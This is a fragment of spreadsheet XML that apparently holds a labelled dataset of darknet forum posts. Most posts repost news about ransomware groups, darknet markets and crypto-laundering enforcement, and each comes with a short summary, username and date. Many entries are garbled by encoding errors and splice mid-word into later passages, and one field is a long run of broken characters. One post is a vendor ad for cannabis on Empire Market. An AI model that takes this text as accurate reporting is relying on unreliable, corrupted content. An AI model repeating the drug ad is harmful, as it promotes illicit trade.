    <t>27/11/2020 19:31</t>
  </si>
  <si>
    <t>0c5333483526c40330a6</t>
  </si>
  <si>
    <t>The Widening Security Holes in Our ���Datasph</t>
  </si>
  <si>
    <t>the actors behind the ���shade��� ransomware, also known as ���troldesh,��� have decided to pull the plug and give away 750,000 decryption keys for free. the particular strain has been around since 2014 and remained quite active until its last days. back in 2019 there ware reports of the rise in troldesh deployments, which made use of compromised websites. in 82% of the time, av tools detected troldesh and stopped it from encrypting files.;;as the actors announced on github yesterday, they are ceasing operations and releasing all decryption keys, their decryption software source code, and instructions on how to decrypt your files. they also pointed out that av companies may use this information to develop easy-to-use decryption tools for everyone out there. moreover, they stated that the source code of their trojan was irrevocably destroyed. the operators claim they stopped distributing ���troldesh��� at the end of 2019, and they also apologized to all the people who fell vy researcher sergey golovanov tested out some of the master decryption keys and confirmed their validity. however, non-tech-savvy users are advised to avoid trying to decrypt their locked files and to maintain their patience for a little while longer. the process isn���t simple, and one could potentially cause irreversible damage, preventing the success of any future restoration efforts. thats why he recommend waiting for emsisoft or any other reputable anti-virus product vendor to create a decryptor. it won���t take long, and it will be available for free, so waiting would your best be</t>
  </si>
  <si>
    <t>Shade ransomware closing down and releasing decryption keys</t>
  </si>
  <si>
    <t>/u/LazyEmployee</t>
  </si>
  <si>
    <t>29/04/2020 02:00</t>
  </si>
  <si>
    <t>2221367607446a88e0e8</t>
  </si>
  <si>
    <t>The ���Troldesh��� Ransomware Terminates Operations and Releases Dec</t>
  </si>
  <si>
    <t>ciao ragazzi, il team darkside �� tornato al lavoro.;controllate il nostro shop su empire market:  thedarkside;;ora in stock amnesia haze buonissima.;;stay safe;;thedark</t>
  </si>
  <si>
    <t>/u/TheDarkside</t>
  </si>
  <si>
    <t>13/07/2020 18:59</t>
  </si>
  <si>
    <t>/d/Italy</t>
  </si>
  <si>
    <t>a81fcc8f0b0bb99f0d18</t>
  </si>
  <si>
    <t>TheDarkside WeeD</t>
  </si>
  <si>
    <t>6 days 06:52:00</t>
  </si>
  <si>
    <t xml:space="preserve">;read this article on deepwebfeed;;ransomware attacks are growing exponentially in size and ransom demand ��� changing the way we operate online.;;source: theprint india;;on the internet, nobody knows you���re a dog. these words from peter steiner���s famous cartoon could easily be applied to the recent ransomware attack on florida-based software supplier kaseya.;;kaseya provides software services to thousands of clients around the world. it���s estimated between 800 and 1,500 medium to small businesses may be impacted by the attack, with the hackers demanding us$50 million (lower than the previously reported us$70 million) in exchange for restoring access to data being held for ransom.;;the global ransomware attack has been labelled the biggest on record. russian cybercriminal organisation revil is the alleged culprit.;;despite its notoriety, nobody really knows what revil is, what it���s capable of or why it does what they does ��� apart from the immediate benefit of hugeacks often involve vast distributed networks, so it���s not even certain the individuals involved would know each other.;;ransomware attacks are growing exponentially in size and ransom demand ��� changing the way we operate online. understanding who these groups are and what they want is critical to taking them down.;;here, we list the top five most dangerous criminal organisations currently online. as far as we know, these rogue groups aren���t backed or sponsored by any state.;;darkside;;darkside is the group behind the colonial pipeline ransom attack in may, which shut down the us colonial pipeline���s fuel distribution network, triggering gasoline shortage concerns.;;the group seemingly first emerged in august last year. it targets large companies that will suffer from any disruption to their services ��� a key factor, as they���re then more likely to pay ransom. such companies are also more likely to have cyber insurance which, for criminals, means easy moneymaking.;;fer a ransomware service. in other words, it carries out ransomware attacks on behalf of other, hidden perpetrator/s so they can lessen their liability. the executor and perpetrator then share profits. groups that offer cybercrime-as-a-service also provide online forum communications to support others who may want to improve their cybercrime skills.;;this might involve teaching someone how to combine distributed denial-of-service (ddos) and ransomware attacks, to put extra pressure on negotiations. the ransomware would prevent a business from working on past and current orders, while a ddos attack would block any new orders.;;revil;;the ransomware-as-a-service group revil is currently making headlines due to the ongoing kaseya incident, as well as another recent attack on global meat processing company jbs. this group has been particularly active in 2020-2021.;;in april, revil stole technical data on unreleased apple products from quanta computer, a taiwanese company that assembles apple laptops. a ransom of us$50 million was demanded to prevent public release of the stolen data. it hasn���t been revealed whether or not this money was paid.;;clop;;the ransomware clop was created in 2019 by a financially-motivated group responsible for yielding half a billion us dollars.;;the clop group���s speciality is ���double-extortion���. this involves targeting organisations with ransom money in exchange for a decryption key that will restore the organisation���s access to stolen data. however, targets will then have to pay extra ransom to not have the data released publicly.;;historical examples reveal that organisations which pay a ransom once are more likely to pay again in the future. so hackers will tend to target the same organisations again and again, asking for more money each time.;;syrian electronic army;;far from a typical cybercrime gang, the syrian electronic army has been launching online attacks since 2011 to promote political propaganda. with this motive, they have been dubbed aroup has links with bashar al-assad���s regime, it���s more likely made up of online vigilantes trying to be media auxiliary for the syrian army.;;their technique is to distribute fake news through reputable sources. in 2013, a single tweet sent by them from the official account of the associated press, the world���s leading news agency, had the effect of wiping billions from the stock market.;;the syrian electronic army exploits the fact that most people online have a tendency to interpret and react to content with an implicit sense of trust. and they���re a prime example of how the boundaries between crime and terror groups online are less distinct than in the physical world.;;fin7;;if this list could contain a ���super villain���, it would be fin7. another russian-based group, fin7 is arguably the most successful online criminal organisation of all time. operating since 2012, it mainly works as a business.;;many of its operations have been undetected for years. its data  scenarios, wherein the data breach serves multiple purposes. for example, it may enable extortion through ransom while also allowing the attacker to use data against victims, such as by reselling it to a third party.;;in early 2017, fin7 was alleged to be behind an attack targeting companies providing filings to the us security and exchange commission. this confidential information was exploited and used to obtain ransom which was then invested on the stock exchange.;;as such, the groups made huge sums of money by trading on confidential information. the insider trading scheme facilitated by hacking went on for many years ��� which is why it���s not possible to quantify the exact amount of economic damage. but it���s estimated to be well over us$1 billion.;;organised crime vs organised criminals;;when it comes to complex criminal organisations, techniques evolve and motives vary.;;the way they organise themselves and commit crimes online is very different from your local offline gang. ransohed from anywhere in the world, so it���s very difficult to prosecute these criminals. matters are made even more complicated when several parties coordinate across borders.;;it���s no wonder the challenge for law enforcement agencies is significant. it���s crucial that authorities investigating an attack are sure it was indeed perpetrated by who they suspect. but to know this, they need all the </t>
  </si>
  <si>
    <t>Article on the top 5 criminal organisations active at this time, includes ransomware gangs</t>
  </si>
  <si>
    <t>d7d6c20a60a5d33f08c3</t>
  </si>
  <si>
    <t>These Are The Top 5 Most Dangerous Criminal Organisations Online Right Now</t>
  </si>
  <si>
    <t>0 days 01:32:00</t>
  </si>
  <si>
    <t>{'extortion': 1, 'revil': 4, 'ransomware': 9}</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;a toshiba business unit said it was hacked earlier this month by the darkside criminal group, the same gang responsible for the attack on colonial pipeline, which caused widespread gas shortages and panic buying across the southeast. toshiba tec said in a statement that its european subsidiaries were hit by the cyberattack and the company���s probing the extent of the impact.;;it said ���it is possible that some information and data may have been leaked by the criminal gang,��� but it hasn���t confirmed that customer-related information was leaked. a company spokesperson confirmed to reuters that the attack appears to have been carried out by the russia-based criminal gang darkside. a spokesperson confirmed to cnbc that the attack took place on may 4.;;the hackers requested ransom, but the company did not pay, the outlet reported. colonial pipeline, in contrast, reportedly forked over a ransom of nearly $5 million within hours of last week���s ared gas shortages and panic buying at us stations across the southeast, likely got darkside more attention than it���d been hoping for, with president biden vowing to go after the gang.;;a toshiba business unit said it was hacked earlier this month by the darkside criminal group, the same gang responsible for the attack on colonial pipeline, which caused widespread gas shortages and panic buying across the southeast. toshiba tec said in a statement that its european subsidiaries were hit by the cyberattack and the company���s probing the extent of the impact.;;it said ���it is possible that some information and data may have been leaked by the criminal gang,��� but it hasn���t confirmed that customer-related information was leaked. a company spokesperson confirmed to reuters that the attack appears to have been carried out by the russia-based criminal gang darkside. a spokesperson confirmed to cnbc that the attack took place on may 4.;;the hackers requested ransom, but the companrted. colonial pipeline, in contrast, reportedly forked over a ransom of nearly $5 million within hours of last week���s attack. that attack, which spurred gas shortages and panic buying at us stations across the southeast, likely got darkside more attention than it���d been hoping for, with president biden vowing to go after the gang.;;���a few hours ago, we lost access to the public part of our infrastructure, namely: blog. payment server. dos servers,��� read a post on the dark web by user darksupp, the operator of darkside, according to the record. the announcement was posted on cybercrime chatboard exploit forum, according to recorded future threat intelligence analyst dmitry smilyanets.;;it remains unclear if the announcement is a ruse for the group to escape attention or avoid paying its partners. cybersecurity analysts warned that anything posted by darkside operators should be tak</t>
  </si>
  <si>
    <t>Toshiba unit attacked by darkside ransomware group</t>
  </si>
  <si>
    <t>18/05/2021 14:36</t>
  </si>
  <si>
    <t>9cffba7903ce86acd87f</t>
  </si>
  <si>
    <t>Toshiba Business Unit Says It Was Hacked by DarkSide Criminal Group</t>
  </si>
  <si>
    <t>{'darkside': 5}</t>
  </si>
  <si>
    <t>do you guys remember tox?;;https://www.deepdotweb.com/2015/05/27/new-deepweb-site-offers-free-ransomware-creation/;;i was wondering if it's still out there and kicking. anyone know?</t>
  </si>
  <si>
    <t>User asking if Tox is still available</t>
  </si>
  <si>
    <t>16/07/2018 03:11</t>
  </si>
  <si>
    <t>0548b06388007a75a79e</t>
  </si>
  <si>
    <t>Tox ransomware still out there?</t>
  </si>
  <si>
    <t>there is a growing number of research studies examining the operations of various darknet markets, or cryptomarkets, with special emphasis on illicit drug trading, which represents the majority of product lists on most of these darknet marketplaces. a recently published paper analyzed these markets with a focus on trading malware, forged documents, stolen credentials, and ���crime-as-a-service��� type of products. we will look at some of the results presented via this paper throughout this article.;;the crime-ware products offered for sale on darknet markets include various popular hacking and social engineering tools (such as ransomware, keyloggers, viruses, trojans, etc.,) in addition to forged documents (such as passports, ids, driver���s license, customs documents, etc.). moreover, among the popularly traded malware is mobile phone zero-day exploits.;;malware.png;;malware sales on dream market:;;the study tracked dream market, which has been operating since 2013 and is by far the largest marketplace currently. on any given day, there is an average of 100,000 illicit product listings, most of which are drugs, yet also malware or digital products. for example, on april 14, 2018, the study showed that 51.1% of products listed for sale comprised illicit drugs, while 41.6% involved digital products, hacking tools, malware, and various forms of counterfeit documents and stolen credentials.;;as when compared to alphabay, dream market is significantly smaller. prior to its shutdown in july 2017, alphabay was one of the biggest cryptomarkets to ever exist on the darknet, with over 40,000 vendors selling over 369,000 products to around 200,000 customers. by the time it was taken down by ���operation bayonet���, there were around 250,000 product listings for illicit drugs, and around 100.000 product listings involving malware, counterfeit identification documents, computer hacking tools, fraudulent services, and firearms.;;the analysis of dream market found anomalous online trends involvingd availability of malware or crime-ware, as well as forged documents��� product listings of this anonymous darknet marketplace. on average, around 12,000 different digital products were listed for sale at any time on dream market during the period of data collection. compromised credit cards and bank accounts comprised the majority of sold digital products (71.6%), followed by popular hacking kits such as spyeye, zeus, phishing kits, and educational tutorials for hacking. stolen credentials were often offered for sale in the form of batches of multiple accounts, and their prices varied according to the face value of the compromised credit card. less commonly sold digital products involved specific malware tools such as ransomware and ddos kits, in addition to various exploits like viruses. this can be best understood with the table below.;;table. malware product listings.png;;generally speaking, the cost of most of these digital products was relatively low. nevertheless, a few digital products were verysive including trojans, and other vulnerabilities. for instance, a modified version of the ransomware, ���ransomware-alm4 locker���, was briefly offered for sale at au$3,848. this price was 60x greater than the price of stock ransomware, and attracted high levels of interest due to its novelty. the higher prices associated with fake ids or documents reflect the significance of ���document fraud��� as one of the key tools of organized crime; a key tool of course in addition to money laundering and the illicit online trade which have the potential to disrupt established real world criminal markets and their conventional distribution models during the next few years.;;malware sales on 0day.today:;;the study also analyzed digital products sold on 0day.today, a darknet ���grey��� market and forum for malware, with emphasis on zero day exploits. the study detected sales of over au$5,000 for apple ios exploits, icloud privilege elevation tools, and windows 2010 exploits.;;final th crime service e-commerce is thriving on anonymous darknet markets. oppositely to drugs sold on darknet markets, and eventually on the street, which are stealthily packaged, and shipped via postal or courier services, digital and malware products offer no chances for interdiction. on the other hand, monitoring of darknet markets can offer some valuable data that can help in the anticipation of the available types of malware and their harms, as well as, their potential victims and targeted vulnerabilities.</t>
  </si>
  <si>
    <t>Posts on the trends of malware and ransomware in the digitial web</t>
  </si>
  <si>
    <t>/u/Lsdslayer</t>
  </si>
  <si>
    <t>25/10/2018 10:44</t>
  </si>
  <si>
    <t>d7c87f9aa6f18b7128c0</t>
  </si>
  <si>
    <t>Trends of malware and digital products sales on darknet marketplaces</t>
  </si>
  <si>
    <t>;read this article on deepwebfeed;;tulsa city officials on wednesday said that hackers responsible for a ransomware attack last month are now sharing residents' personal information online.;;source: msn / the hill;;over 18,000 city files, including police reports and police department information, have been shared on the dark web, tulsa's chief information officer michael dellinger told the associated press. "while we're still investigating, some of the files contained personally identifiable information, such as name, date of birth, address and driver's license (numbers)," he said.;;dellinger added that residents' social security numbers were not included in police reports. the hackers responsible for the ransomware attack, which involves malicious software that places a lock on computer data until a ransom is paid, reportedly sent city officials a letter requesting that a payment be negotiated.;;"we chose not to do this," dellinger told the ap. people who have filed a police report have been advised by city officials to monitor their accounts for activity as well as contact their credit and debit card companies to update their passwords, the news outlet noted.;;the city identified the ransomware on may 6 and said initially that no personal data was accessed in the attack. dellinger said that restoring the city's core computer systems could take up to two months.;;"as part of the restoration effort, the city has implemented additional security measures and increased monitoring to further protect citizens' data from future attacks," he said, according to the ap.</t>
  </si>
  <si>
    <t>Residents personal data released from Tulsa ransomware attack</t>
  </si>
  <si>
    <t>30/06/2021 18:00</t>
  </si>
  <si>
    <t>c3906743f354d91044ad</t>
  </si>
  <si>
    <t>Tulsa Residents Personal Information Shared on Dark Web Following Ransomware Attack</t>
  </si>
  <si>
    <t>the u.s. government is offering $5 million for leads about north korea���s hackers and their ongoing cybercriminal operations.;;the latest news comes hot in the heels of a joint advisory produced by the u.s. departments of state, the u.s. treasury, homeland security and the federal bureau of investigation (fbi) which sought to provide guidance on the north korean cyber threat.;;apart from spelling out the intended reward targeting north korean hackers, the advisory also went further to prescribe mitigation mechanisms that the global community, cyber defenders, and the general public can use in cybersecurity.;;specifically, the measures are aimed at helping various stakeholders to build defenses against state sponsored hacking groups supported by north korea (referred to as the democratic people���s republic of korea aka dprk).;;the joint report on the north korean threat;;;the u.s. government has acknowledged the fact that north korean cybercriminals continue to pose significant threat to the fina and stability of global economies.;;the joint report bears a bundle of information regarding north korea���s cyber operations that have existed in the recent past by plugging into data provided by the un security council report.;;the document contains detailed information about the north korean tactic of employing hacking groups in raising money for the country���s regime in an effort to bypass the effects of the longstanding international sanctions imposed on pyongyang.;;importantly, the report has issued warnings to financial institutions and organizations across various economic spectra to reinforce their defenses against the north korean cyber attackers.;;in addition, the report has documented relevant information concerning the u.s. government resources that have been placed on standby (targeting dprk activities) so that organizations can study and build on their protections to stay shielded against north korean malware and cyber tactics.;;;also in the report, the u.s. government has caution against sympathizing with north korean hacking machinery, including the organizations whose activities have directly or indirectly assisted north korean hacking groups to launder dirty money.;;the document has outlined a number of punitive actions that would be levelled against companies found to act as accomplices to north korean cybercriminal acts including the imposition of sanctions and the seizure of assets.;;dprk activity;;a host of past cyber-enabled criminal activity and espionage campaigns suffered by digital asset exchanges and financial entities have been blamed on north korean hacking groups which constitute hackers, cryptology experts and software developers.;;the u.s. government has identified the range of malicious activities from north korea, otherwise referred to under the moniker hidden cobra which, like mentioned before, have been used to raise funds illegally for the current north korean regime. specifically, the following tactics have been used:;;���	cyber-enabled financial heists ney laundering activities.;���	crypto-jacking operations.;���	extortion campaigns.;;according to the dprk cyber threat advisory, north korean cybercriminals have been executing extortion campaigns targeting third-country entities by attacking networks and threatening to shut down the entities��� networks until a ransom is paid.;;in some cases, the cyber actors have demanded payment from victims while disguised under long-term remunerated consulting agreements that would mean that the malicious actors will forgo any plans to launch cyber-attacks in the future.;;further, it has gone on record that dprk cybercriminals have also been used by third part actors to hack websites and extort organizations. the fact that north korean hackers have been used in hackers-for-hire contracts is mindboggling, and exposes the fact that the pyongyang regime has heavily invested in its cyber capability with an intention to heavily monetize it.;;to conclude, while the international community hopes that the northat will be dealt with as it comes, the latest joint guidance by the u.s. government may be the new sheriff in town after all.</t>
  </si>
  <si>
    <t>article stating how US officals claim to offer a bounty for North korean hackers</t>
  </si>
  <si>
    <t>18/04/2020 12:19</t>
  </si>
  <si>
    <t>7c1504e0e1c879ca5601</t>
  </si>
  <si>
    <t>U.S. Government Places a $5 Million Bounty on North Korean Hackers</t>
  </si>
  <si>
    <t>���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������;���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������;;how real criminals do their thing and get away clean.;;;;the united states has remained largely quiet about its offensive capabilities when it comes to cybersecurity operations. but recently, the director of the national security agency and the cyber command, general nakasone, made reference to such capabilities and described how its operational elements were dedicated to helping ukraine in its cyber security defense before the russian invasion. furthermore, the recent successful recovery of bitcoin ransoms paid by the fbi demonstrates the ability of the united states to take offensive cybersecurity measures.;;;cutting hydra;;;on april 6, 2022, united states attorney general merrick b. garland shared another aspect of us offensive cybersecurity capabilities when it announced that the kleptocapture task force successfully disrupted the russian military intelligence (gru) botnet.;the united states, along with germany, seized hydra���s darknet market. the ag described hydra as ���the world���s largest illegal marketplace on the dark web.��� besides, charges were filed against dmitry pavlov whoer of hydra���s technical infrastructure. the indictment estimated that hydra-controlled cryptocurrency wallets received approximately $5.2 billion worth of cryptocurrency from 2016 to 2022, ���representing approximately 80% of all darknet market-related cryptocurrency transactions.���;;;;the u.s. federal bureau of investigation (fbi) says it has disrupted a giant botnet built and operated by a russian government intelligence unit known for launching destructive cyberattacks against energy infrastructure in the united states and ukraine. separately, law enforcement agencies in the u.s. and germany moved to decapitate ���hydra,��� a billion-dollar russian darknet drug bazaar that also helped to launder the profits of multiple russian ransomware groups.;;;stop the sandworm;;;at the same time, fbi director christopher wray provided additional color. while describing a separate takedown, and how the fbi had removed ���malware from devices used by thousands of mostly small busine world. and then we closed the door that the russians had used to get into them.��� he described how the gru built the botnet; specifically, a team of security researchers known as the sandworm team. the sandworm team implanted malware (cyclops blink) on watchguard technologies fireboxes and used those devices to launch denial-of-service attacks. this was not a solo fbi effort, but included cross-border liaison and collaboration, with the uk national cyber security centre, nsa, dhs/cisa all playing important roles.;;;the the justice department filed charges against six members of the gru sandworm group in october 2020 for his role in bringing down the ukrainian government and critical infrastructure in the 2015-2016 cyberattacks. in it elimination of april 2022, the order package highlighted how the sandworm team, gru military unit 74455, welcomed cybersecurity researchers and operational staff.;;;;sanctions;;;;secretary of state antony blinken commented that the collaboration with germany in neutralizdra was ���coordinated with our allies and partners: disrupting ransomware infrastructure and actors and targeting virtual currency abuse to launder ransom payments.���;he added that the us treasury department has designated hydra and garantex (virtual currency exchange). treasury secretary janet yellen in her statement explaining the sanctions, he said: ���our actions send a message to criminals today that they cannot hide on the dark web or its forums, and they cannot hide in russia or anywhere else in the world. in coordination with allies and partners, such as germany and estonia, we will continue to disrupt these networks.���;;;while russia���s ability to reconstitute a cryptocurrency market like hydra and continue the operational activities of the sandman group has been disrupted, it would be folly to consider them destroyed. rather, it is wise to consider that they are instead in the process of taking stock of their losses and rethinking how they are going about their busisone groups, the nsa, and the us cyber command will earn their keep, as they strive to stay one step ahead of the gru.;;;https://freedigitalspirit.com/us-disrupted-russian-gru-hydra-and-sandworm/;;https://krebsonsecurity.com/2022/04/actions-target-russian-govt-botnet-hydra-dark-market/;;https://securityboulevard.com/2022/04/us-disrupted-russian-grus-hydra-and-sandworm/</t>
  </si>
  <si>
    <t xml:space="preserve">Article on how the destruction of hydra affected the infrastructure of the dark web including ransomware </t>
  </si>
  <si>
    <t>27/04/2022 04:34</t>
  </si>
  <si>
    <t>2e41c51dd9368476d27b</t>
  </si>
  <si>
    <t>US Disrupted Russian GRU Hydra and Sandworm: Political Firepower</t>
  </si>
  <si>
    <t>1 days 15:33:00</t>
  </si>
  <si>
    <t>biden warns private sector to harden its cyber defenses;white house cites ���evolving intelligence��� of potential attacks;;biden reiterated those warnings, prompted by what he called ���evolving intelligence that the russian government is exploring options for potential cyberattacks.��� he urged the the u.s. private sector: ���harden your cyber defense immediately.���;;while the white house provided few details about the nature of the threat, the president���s message underscored the continuing threat in cyberspace for u.s. businesses and organizations. cyberattacks have played a smaller role in russia���s invasion of ukraine than many experts predicted, supplanted by a grinding and bloody ground campaign. anticipated retaliatory attacks against u.s. businesses and organizations apparently haven���t occurred in the wake of strict sanctions, at least not on a major scale.;;anne neuberger, the deputy national security adviser for cyber and emerging technolo� of an attack on the u.s. but that biden���s statement was a ���call to action.���;;���there are cyberattacks that occur every day,��� she said, adding that biden���s warning was intended to focus attention on ���critical infrastructure.��� she declined to specify which industries might be threatened.;;biden, in his statement, said ���critical infrastructure owners and operators must accelerate efforts to lock their digital doors.���;;the president later stressed the danger to chief executives at a meeting of the business roundtable on monday evening. ���one of the tools he���s most likely to use, in my view and our view, is cyber, cyberattacks,��� he said. ���he has the capability. he hasn���t used it yet but it���s part of his playbook.���;;;;and the national security agency, through a spokesperson, said that improving defenses against cyber threats now was crucial, and that the organization had publicly conveyed information about possible harmful operations with links to russia.;;the white house is limited in just how far it can protect critical infrastructure, which includes everything from dams and electric grids to water systems and food production. much of it is operated by the private sector, regulatory oversight is patchy, and the level of cybersecurity preparedness varies greatly by industry and by company. since a string of high-profile assaults last year -- including a ransomware attack on colonial pipeline co. that snarled fuel supplies along the east coast in may -- the biden administration has pleaded with operators to bolster cyber defenses.;;���the number of companies that have not done the best practice is surprising and is much larger than you would have thought,��� james lewis said. ���if you���re the russians and you���re looking for one target to make a point, you���ve still got a lot to pick from.���;;federal agencies briefed more than 100 companies on the elevated threat of cyberattacks last week, neuberger said. that included information about tehings as scanning websites and hunting for vulnerabilities in systems.</t>
  </si>
  <si>
    <t>Article about Biden asking the private sector to harden it's defences</t>
  </si>
  <si>
    <t>/u/fhhfdv4734</t>
  </si>
  <si>
    <t>22/03/2022 08:20</t>
  </si>
  <si>
    <t>/d/DarknetMonitor</t>
  </si>
  <si>
    <t>53247d982438b55e755a</t>
  </si>
  <si>
    <t>US Intel Warns of Large Scale Russian Cyber-Attack</t>
  </si>
  <si>
    <t>the united states treasury department sanctioned the cryptocurrency mixer blender.io. blender is the first mixer to be sanctioned by the u.s. government.;;the u.s. department of the treasury���s office of foreign assets control (ofac) sanctioned the bitcoin mixer blender.io for allegedly processing $20.5 million in stolen cryptocurrency.;;according to the treasury department, lazarus group, a hacking group purportedly sponsored by the democratic people���s republic of korea (dprk), moved more than 20 million dollars worth of cryptocurrency through blender.io. lazarus group reportedly stole virtual currency worth 600 million dollars from ���a blockchain project linked to the online game axie infinity.��� the 20 million processed by blender.io, according to the treasury department, was a part of the axie infinity heist.;;;today, for the first time ever, treasury is sanctioning a virtual currency mixer,��� said under secretary of the treasury for terrorism and financial intelligenceurrency mixers that assist illicit transactions pose a threat to u.s. national security interests. we are taking action against illicit financial activity by the dprk and will not allow state-sponsored thievery and its money-laundering enablers to go unanswered.;;per cointelegraph.com:;;in late march, ronin, an ethereum sidechain built for the popular play-to-earn nonfungible token game axie infinity, was hacked for over 173,600 ether (eth) and 25.5 million usd coin (usdc) for a combined value of over $600 million.;;the updated list of dprk sanctions includes blender.to, blender.io, blender���s onion address (blenderiopnzbuvtva6d2ddiedrbf6fbekh5axomzho6wrulowcludad.onion), their telegram bots, and the company���s email addresses, among other things. additionally, the treasury department identified four ethereum addresses allegedly associated with lazarus group. all four have been added to the list of sanctions.;;0x098b716b8aaf21512996dc57eb0615e2383e2f96;;0xa0e1c89ef1a489c9c7de96311ed5ce5d32c20e4b47b7b41c56258d9c7731abadc360e073;;0x53b6936513e738f44fb50d2b9476730c0ab3bfc1;;;;while most virtual currency activity is licit, it can be used for illicit activity, including sanctions evasion, through mixers, peer-to-peer exchangers, darknet markets, and exchanges. this includes the facilitation of heists, ransomware schemes, and other cybercrimes. treasury continues to use its authorities against malicious cyber actors in concert with other u.s. departments and agencies, as well as our foreign partners, to disrupt financial nodes tied to illicit payments and cyber-attacks. those in the virtual currency industry play a critical role in implementing appropriate anti-money laundering/countering the financing of terrorism (aml/cft) and sanctions controls to prevent sanctioned persons and other illicit actors from exploiting virtual currency to undermine u.s foreign policy and national security interests.;;;the virtual currency mixers that assist criminals are a threat to u.s. national security interests. treasury will continue to investigate the use of mixers for illicit purposes and consider the range of authorities treasury has to respond to illicit financing risks in the virtual currency ecosystem. for example, in 2020, treasury���s financial crime enforcement network (fincen) assessed a $60 million civil money penalty against the owner and operator of a virtual currency mixer for violations of the bank secrecy act (bsa) and its implementing regulations. criminals have increased use of anonymity-enhancing technologies, including mixers, to help hide the movement or origin of funds. additional information on illicit financing risks associated with mixers and other anonymity-enhancing technologies in the virtual asset ecosystem can be found in the 2022 national money laundering risk assessment.;;blender paused operations in april for maintenance. as of may 7, 2022 at 9:14 pm (gmt +1), all three of blender���s sanctioned addresses are offline (as is one that was not sanctioned).;;_______________________________________________________________________;;dark net daily is your trusted source for everything darknet related. find breaking news, interviews with vendors, and more at:;;http://darknet7l2gxurmadtuv3w3554fv55xykjb2ypfbhr5k7uzdmpjkvbad.onion/;or darknetdaily.com;;;your clearnet source for darknet news.;</t>
  </si>
  <si>
    <t>Article stating the US treasury banned cryptocurrency mixer Blender (related to ransomware)</t>
  </si>
  <si>
    <t>/u/DarkNetDaily</t>
  </si>
  <si>
    <t>/d/DarkNetDaily</t>
  </si>
  <si>
    <t>eae955045b6d18823b42</t>
  </si>
  <si>
    <t>US Sanctions Cryptocurrency Mixer blender.io</t>
  </si>
  <si>
    <t>launched on july 5th, 1865, the secret service���s role has evolved over the years. initially attached to the treasury, their primary purpose has been ensuring the safety of the us commander in chief alongside curtailing counterfeiting of the us currency.;;however, after the 9/11 tragedy, the secret service was moved to the department of homeland security (dhs). the purview of the service now extends to the investigation of financial crimes that have evolved significantly due to emerging technologies such as cryptocurrencies. however, there have been talks recently about possibly reuniting the secret service with the treasury.;increased cybercrimes during a global pandemic;;secret service cyber policy advisor jonah force hill has offered insight on how their role has been modernized, especially with ongoing talks around the development of the digital dollar. he also reports a spike in financial crimes against us citizens during this covid-19 time with the fbi reporting a 75% increase in day to day cyber in a june us house meeting. this was collaborated by statistics offered by vmware cybersec strategy lead, tom kellermann, indicating a large 900% bump in ransomware attacks in the first two quarters of 2020.;;despite cybercriminals demanding for crypto for ransomware, he admits that crypto is not the issue but just a small element of the crime. he highlights that cryptocurrencies will come under the scrutiny of the secret service if they undermine the integrity of financial and remittance systems. money laundering and fraud use cases are also warranting intervention from the secret service.;;there was mention of crime as a service model where cybercriminals offer customized services and data at a fee. this could include easily exploitable vulnerabilities in the systems, account login credentials, identities, and infrastructure, such as disk space for storage. this type of model enables the cybercriminals to gang up together to orchestrate a crime, drawing similarities with a bank heist crew where each member has a specific skill set.</t>
  </si>
  <si>
    <t xml:space="preserve">Post about how the US secret service has evolved to handle cybercrime including ransomware </t>
  </si>
  <si>
    <t>96021299aad2bdf10c11</t>
  </si>
  <si>
    <t>US Secret Service Has Modernized Its Role In Tackling Financial Crimes In The Crypto Era</t>
  </si>
  <si>
    <t>8 days 06:51:00</t>
  </si>
  <si>
    <t>interesting read. i love posts like this.</t>
  </si>
  <si>
    <t>/u/BobTheIcelandean</t>
  </si>
  <si>
    <t>in july 2017, authorities arrested an alleged criminal and fined his cryptocurrency exchange for being used as a tool to launder money, facilitate dark web drug sales and ransomware activities. alexander vinnik, the alleged operator was also accused of using his exchange, btc-e to commit other criminal offenses, and for this reason, btc-e and vinnik were charged with one count of operation of unlawful money services and another count of conspiracy to commit money laundering.;authorities fined him $12 million and also fined the exchange $100 million. btc-e was launched in 2011, and had been used as a tool by cybercriminals for money laundering. according to the criminal complaint read, the exchange did not follow the basic procedure of the know-your-client rule. this rule demands exchanges to require identification documents from users to prevent cybercrime. the site ignored this rule and made it convenient for criminals to launder money safely.;in most cases, users used sensitive names like ���isis� phackerforhire���. however, the exchange failed to investigate them. btc-e did not even request for the basic information such as name, date of birth and address from clients. it made it easier for criminals as it just requested for usernames, email addresses and a passwords. the exchange was not properly registered, and was basically used to convert cryptocurrencies to fiats.;according to reports, the defunct company processed over 300,000 transactions from cryptolocker and locky malware. not just that, it processed over $3 million stolen funds from the famous mt.gox exchange.;as claimed by the court, the exchange illegally refused to collect information from clients in a bid to avoid their transaction history being traced. it also covered up the fact that it facilitated transactions for u.s based users. it even went the extra mile to employ the selection of front companies to process withdrawals and deposits from its users.;allegedly, btc-e had a good relationship with the costa rica-based liberty reseand even at a point shared customers. however, btc-e failed to open up about their smuggled funds and alliance. liberty reserved laundered $6 billion and had six of its operators arrested. not just that, the exchange also had a good relationship with an unregistered company called coin.mx. the site made about 1000 transactions on the btc-e platform, and it was later accused of money laundering and conspiracy charges. surprisingly, btc-e again refused to disclose its relationship in a suspicious fraudulent report.;since its inception in 2011, btc-e hosted about 700,000 users and saw a traded amount of about $296,000 in 21,000 bitcoins transactions. btc-e was one of the earliest cryptocurrency exchanges along with mt.gox, and facilitated a lot of transactions in other cryptocurrencies as well. according to the authorities, not all the clients of the exchange engaged in criminal activities, but a significant number of them did.;the court further stated that the exchange managed by vinnik concealed illegal operations and received cryptocurrencies obtained through scams,  botnet and computer hijacking. it ensured that both parties who engaged in transactions were not exposed. according to the court, the exchange had no single anti-money laundering policy in place and had no measure to detect suspicious transactions, let alone, fighting it. vinnik went against the rules and used his exchange as a personal bank. he objected the allegation that he was an execute on the site. however, authorities believe he took part in the administrative, financial, operational, and support accounts role on the site.;vinnik was arrested in greece in july 2017. he was indicted for 17 charges of money laundering as well as two charges of unlawful monetary transaction. however, he pleaded not 